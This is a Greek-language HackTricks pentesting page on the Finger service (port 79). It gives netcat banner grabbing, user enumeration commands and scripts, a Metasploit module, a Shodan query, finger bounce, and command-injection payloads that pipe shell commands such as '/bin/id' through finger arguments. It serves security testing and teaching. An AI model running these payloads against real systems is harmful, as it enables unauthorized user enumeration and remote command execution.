79 - Pentesting Finger

Support HackTricks

Άμεσα διαθέσιμη ρύθμιση για αξιολόγηση ευπαθειών & δοκιμές διείσδυσης. Εκτελέστε μια πλήρη δοκιμή από οπουδήποτε με 20+ εργαλεία & δυνατότητες που κυμαίνονται από αναγνώριση έως αναφορά. Δεν αντικαθιστούμε τους pentesters - αναπτύσσουμε προσαρμοσμένα εργαλεία, μονάδες ανίχνευσης & εκμετάλλευσης για να τους δώσουμε πίσω λίγο χρόνο για να εμβαθύνουν, να ανοίξουν κέλυφος και να διασκεδάσουν.

Βασικές Πληροφορίες

Το Finger πρόγραμμα/υπηρεσία χρησιμοποιείται για την ανάκτηση λεπτομερειών σχετικά με τους χρήστες υπολογιστών. Συνήθως, οι πληροφορίες που παρέχονται περιλαμβάνουν το όνομα σύνδεσης του χρήστη, το πλήρες όνομα και, σε ορισμένες περιπτώσεις, επιπλέον λεπτομέρειες. Αυτές οι επιπλέον λεπτομέρειες θα μπορούσαν να περιλαμβάνουν την τοποθεσία του γραφείου και τον αριθμό τηλεφώνου (αν είναι διαθέσιμος), την ώρα που ο χρήστης συνδέθηκε, την περίοδο αδράνειας (idle time), την τελευταία φορά που διαβάστηκε το email από τον χρήστη και το περιεχόμενο των σχεδίων και αρχείων έργου του χρήστη.

Προεπιλεγμένη θύρα: 79

PORT   STATE SERVICE
79/tcp open  finger

Καταμέτρηση

Λήψη Πανό/Βασική σύνδεση

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Καταμέτρηση χρηστών

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Εναλλακτικά, μπορείτε να χρησιμοποιήσετε το finger-user-enum από τον pentestmonkey, μερικά παραδείγματα:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap εκτελεί ένα σενάριο για να χρησιμοποιήσει τα προεπιλεγμένα σενάρια

Metasploit χρησιμοποιεί περισσότερα κόλπα από το Nmap

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Εκτέλεση εντολών

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Χρησιμοποιήστε ένα σύστημα ως δρομολογητή finger

finger user@host@victim
finger @internal@external

Άμεσα διαθέσιμη ρύθμιση για αξιολόγηση ευπαθειών & δοκιμές διείσδυσης. Εκτελέστε μια πλήρη δοκιμή από οπουδήποτε με 20+ εργαλεία & δυνατότητες που κυμαίνονται από αναγνώριση έως αναφορά. Δεν αντικαθιστούμε τους pentesters - αναπτύσσουμε προσαρμοσμένα εργαλεία, μονάδες ανίχνευσης & εκμετάλλευσης για να τους δώσουμε πίσω λίγο χρόνο για να εμβαθύνουν, να ανοίξουν κέλυφα και να διασκεδάσουν.

Υποστηρίξτε το HackTricks

Last updated